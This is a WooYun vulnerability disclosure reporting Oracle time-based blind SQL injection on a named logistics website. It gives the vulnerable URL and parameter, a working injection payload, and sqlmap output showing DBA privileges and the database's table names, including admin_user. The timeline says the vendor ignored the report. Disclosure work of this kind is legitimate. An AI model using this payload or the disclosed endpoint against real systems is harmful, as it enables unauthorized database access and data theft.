乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-22: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-06: 厂商已经主动忽略漏洞,细节向公众公开
hwww.huozhan.com全球最大的商贸物流平台!
注入点:
http://www.huozhan.com/SupplierItemCate_searchProductList.do?SUPPLIER_CODE=010375&AREA_CODE=010BJ
Place: GETParameter: AREA_CODE Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: SUPPLIER_CODE=010375&AREA_CODE=010BJ' AND 2609=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(112)||CHR(87)||CHR(84),5) AND 'uZrB'='uZrB---there were multiple injection points, please select the one to use for following injections:[0] place: GET, parameter: SUPPLIER_CODE, type: Single quoted string (default)[1] place: GET, parameter: AREA_CODE, type: Single quoted string[q] Quit>[11:16:40] [INFO] the back-end DBMS is Oracleweb application technology: Nginx, JSPback-end DBMS: Oracle[11:16:40] [INFO] fetching current user[11:16:40] [INFO] retrieved:[11:16:40] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries[11:16:56] [INFO] adjusting time delay to 4 seconds due to good response timesHUOZHANcurrent user: 'HUOZHAN'
web application technology: Nginx, JSPback-end DBMS: Oracle[11:22:08] [INFO] testing if current user is DBA[11:22:08] [WARNING] time-based comparison needs larger stg a few dummy requests, please wait..[11:22:20] [WARNING] it is very important not to stress thndwidth during usage of time-based queries1current user is DBA: 'True'
泄漏敏感信息
Current database[12 tables]+---------------------+| ALL_USERS || TABLE_PRIVILEGE_MAP || admin_user || article || auth || city || dictionary || inventory || store || supplier || user_types || zl_deeds |+---------------------+
目测这没注册厂商,没进行dump操作
admin_user ALL_USERS user_types
未能联系到厂商或者厂商积极拒绝